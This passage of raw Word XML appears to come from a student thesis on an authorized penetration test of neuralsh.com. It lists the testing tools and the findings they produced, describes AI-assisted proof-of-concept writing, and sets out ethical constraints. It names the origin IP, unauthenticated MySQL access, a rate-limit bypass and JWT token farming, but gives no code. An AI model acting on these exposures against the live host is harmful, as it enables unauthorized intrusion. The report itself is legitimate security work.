            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Database connector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Verified MySQL port 3306 accepted unauthenticated connection attempts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Table 6: Automated testing tools used in this engagement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[Figure 10: Nmap logo — nmap_logo.png]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Nmap (Network Mapper) is the industry-standard open-source tool for network discovery and service fingerprinting. A full TCP scan with service version detection against the origin server revealed that 103.16.62.217 had 23 ports open and reachable from the public internet — including administrative interfaces that should never be exposed. This single scan produced the evidence base for Critical findings N-001, N-002, N-013, and N-014.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[Figure 11: Nikto logo — nikto_logo.png]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Nikto is an open-source web server scanner that checks for thousands of known misconfigurations, outdated software versions, and missing security controls. In this engagement, Nikto was run against both the Cloudflare-protected frontend and directly against the origin IP, contributing to findings N-003 (Missing Security Headers), N-012 (Server Version Disclosure), and N-017 (Directory Listing Enabled).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[Figure 12: Shodan logo — shodan_logo.png]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Shodan was used as a passive intelligence source to verify that the services discovered by Nmap were also visible to external internet scanners — confirming these exposures were not local network artifacts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2. Manual Testing Tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Manual tools require the assessor to actively craft, send, and interpret requests based on judgment and understanding of the target's behavior. The most significant confirmed findings in this engagement were discovered through manual testing.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74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**Tool**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**Type**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**Role in This Engagement**</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**Burp Suite Community**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Web proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Intercepted HTTP/S traffic, replayed requests, demonstrated rate-limit bypass and JWT farming</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**curl**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>HTTP client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Crafted raw HTTP requests with custom headers for PoC exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**CyberChef**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Data analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Decoded and inspected JWT token payloads</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**dig / whois**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>DNS tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Manual DNS record enumeration — identified origin IP via MX record</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**openssl**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>TLS inspector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Inspected SSL certificate details — confirmed hostname and infrastructure leakage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**hashcat**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Password cracker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Attempted JWT secret key brute-force against the rockyou.txt wordlist</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**Metasploit Framework**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Exploitation framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Used for controlled exploitation in the alternative testing environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Table 7: Manual testing tools used in this engagement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[Figure 13: Burp Suite logo — burpsuite_logo.png]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Burp Suite Community Edition served as the primary web application testing proxy throughout the engagement. All HTTP traffic between the testing machine and neuralsh.com was routed through Burp Suite's intercepting proxy, allowing every request and response to be inspected, modified, and replayed. The two confirmed exploited findings — Rate Limiting Bypass (N-005) and JWT Token Farming (N-007) — were both demonstrated using Burp Suite's Repeater tool.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[Figure 14: CyberChef logo — cyberchef_logo.png]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CyberChef, developed by GCHQ, was used to decode Base64url-encoded JWT tokens issued by the /web/v1/init/token endpoint. By splitting the token into its three components (header, payload, signature) and decoding each, it was possible to inspect the token's signing algorithm, timestamps, expiry window, and embedded user claims without needing to crack the secret.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>3. AI-Assisted Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Artificial intelligence tools represented a supporting layer in this engagement — used to assist with specific technical analysis tasks during the testing process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[Figure 15: Claude (Anthropic) logo — claude_logo.png]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Claude by Anthropic was used during this engagement in the following technical capacities: proof-of-concept script generation for the rate-limiting bypass and JWT token farming tests; scan output analysis to cross-reference open ports against known service vulnerabilities; and CVSS scoring verification to ensure metric selections were consistent and defensible across all 20 findings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>It is important to note that all findings documented in this thesis were discovered and verified by the assessor through direct, hands-on interaction with the target systems. AI was used as a technical aid during the testing process — not as an author of this thesis. Every result produced with AI assistance was independently reviewed and validated before inclusion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4. Ethical Constraints</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>All testing activities were conducted with written authorization from Prestige Alliance Co., Ltd. The following self-imposed constraints were applied throughout the engagement:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1. No production data was extracted, modified, or deleted at any point during testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2. Rate-limiting bypass demonstration was capped at 50 requests per test scenario</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3. No persistent access mechanisms or backdoors were installed on any system</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4. MySQL brute-force testing was limited to a bounded pre-defined wordlist only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5. No Denial of Service testing was conducted against any in-scope or adjacent system</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>6. Full exploitation demonstrations were performed only within the controlled alternative testing environment (DVWA on Kali Linux VM)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>CHAPTER 4: IMPLEMENTATION AND DEPLOYMENT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This chapter documents the practical execution of the penetration testing engagement from start to finish. It begins with the environment setup used to conduct all testing, proceeds through reconnaissance, scanning, and vulnerability assessment on the real target, then documents the exploitation results — both on neuralsh.com and in a controlled alternative environment designed to demonstrate full web application exploitation technique without risk to the production system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
